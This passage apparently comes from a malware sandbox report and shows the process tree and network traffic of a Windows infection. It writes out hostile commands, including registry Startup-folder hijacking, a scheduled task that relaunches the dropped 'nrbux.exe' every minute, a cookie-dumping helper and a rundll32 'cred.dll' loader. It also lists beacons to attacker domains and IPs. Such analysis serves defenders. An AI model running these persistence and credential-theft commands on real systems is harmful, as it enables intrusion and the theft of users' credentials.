                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:4620
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5360
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:2420
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c arnatic_2.exe
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:2016
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_2.exe
                                                                                                                                                                                          arnatic_2.exe
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                          PID:988
                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:4000
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:2084
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8936.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8936.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:584
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4308
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4872
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:3112
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nrbux.exe /TR "C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe" /F
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:4572
                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                          "C:\Windows\System32\rundll32.exe" C:\ProgramData\f1a6a48e76c1fd\cred.dll, Main
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:5716
                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:5820
                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      PID:5896
                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:4572
                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                      PID:4340
                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5700
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        PID:1920
                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        PID:5748

                                                                                                                                                                                      Network

                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        motiwa.xyz
                                                                                                                                                                                        setup_install.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        motiwa.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        motiwa.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.12.59
                                                                                                                                                                                        motiwa.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.193.180
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7
                                                                                                                                                                                        setup_install.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.12.59:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7 HTTP/1.1
                                                                                                                                                                                        Host: motiwa.xyz
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:45 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07aaf7250000eba157926000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=SMjWZoJvajng9lBKEhcYVzSCr8tR7NvAEGIzEKJTNQmJa2WlJgRqQDHDxo4qNAWb6wAxDWVS%2FeVgY%2FMyJ1zgGKgjLCBpVR53c%2B8umHvA0XbMezLrMv8DkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614383905eba1-LAX
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ip-api.com
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ip-api.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ip-api.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        208.95.112.1
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://ip-api.com/json/
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        208.95.112.1:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /json/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:46 GMT
                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                        Content-Length: 310
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Ttl: 48
                                                                                                                                                                                        X-Rl: 41
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.133/server.txt
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.133:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /server.txt HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.133
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        videoconvert-download38.xyz
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        videoconvert-download38.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        videoconvert-download38.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.201.250
                                                                                                                                                                                        videoconvert-download38.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.42.63
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        IN A
                                                                                                                                                                                        198.13.62.186
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        email.yg9.me
                                                                                                                                                                                        IN AAAA
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_1
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_1 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:50 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Nno1GeBJNFhexDlDx2VcS8NYiG%2FRe6gSs4W2FURCyRRNlXVGfp2n%2BMUV7f1xapD7rgyIGznWoYlDcxwQ8ooL1q0hddfi2%2B7jqMS4fisjiXQSayBpMEQD1hsJ24aXD280yU77HKX9jhk9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861457d8b142d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_2
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_2 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:52 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=pkIaB%2B6o5dm9gsVB8RYNhkpwo4hgZHC0WvCrL68QVI%2FvA2%2BXunOMB1aIUVKSZAfTOpvQV0Dt6S288xV3J7YNBH8%2Bv2%2Bo%2BvK6CrNqfYPXmLiQfUOfm%2Be1dZSZobwhoYljkUy4no3waGdS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861464e8ac42d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_3
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_3 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:55 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=pTl06bl8BPxRRMrROM9IEbH3mj8YEK5mrrFtal4ufNXzZR%2FurG7ZW%2BqjQ%2BTSaOMph4sEDp5UtDyBrWvLWFrK%2Bx5EpUnsUbTemYRFS38mTox6e8frxXK7OrMlNmD0ulAJZkfgkqH5leum"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861471892242d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_4
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_4 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:56 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kIO8%2BfGBDj4x2SoNditcA6mTh4VTbrxZPLHTtfqmsNeoaZC35kIFLcVmZrnsIgqjGgdXWToiy6r09GYSaLj7iJAy%2B26ua13akQfsQM0Kk0ZY1Sv22AKXaL5InS7BFN6THt4tKPrIrI0J"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861478c8be42d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_5
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_5 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:56 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=E9s%2FqGTJjYkcqbItjH%2BePQn1QqUWKRFri3MLXlh3ZtDg7mBT11JoWXhdXexVq79Jbcm2nJnn2hPBSpKHjyR6XFjU5QXs0iv92YS69ER111d13l26J0WuPrETXrCAyjewpJZQhTEqVGiU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686147f2d9342d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://videoconvert-download38.xyz/?user=newpb1_6
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.201.250:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /?user=newpb1_6 HTTP/1.1
                                                                                                                                                                                        Host: videoconvert-download38.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:01 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=BxDMWWQZLIsqacbrR5wPwhTLiHKKB8nYZCp3G9QcoIuRyWyui2r%2FdToJCkCxlGEDDnjIuzaspRuEgUNy4QA%2Fqv147GJ%2ByD%2BM3vvaAEtiDWlPVytKIQVV765kAbDqXRCJ%2B4F9YaV9%2B8es"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861499dfca42d8-LAX
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        157.240.240.35
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.240.240.35:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Set-Cookie: fr=18naQPwUJldxA39Iv..Bg3rzr.8L.AAA.0.0.Bg3rzr.AWVBZs5OhhU; expires=Thu, 30-Sep-2021 07:14:50 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        Set-Cookie: sb=67zeYDpbc9661wiYKjJX41in; expires=Sun, 02-Jul-2023 07:14:51 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Alt-Svc: h2="facebook24aqddxga4kgbs6ad57bwfb6ly6adpivrxphkrwegy5q26yd.onion:443"; ma=86400
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: zD23XUe+YJAdqYImX2qE6Hxu0Uz7oRzOKueX/IC9wgZqMobp47YxFyUpIoKHYGU8j78/k38HhjuyUSrPiQJXKw==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:51 GMT
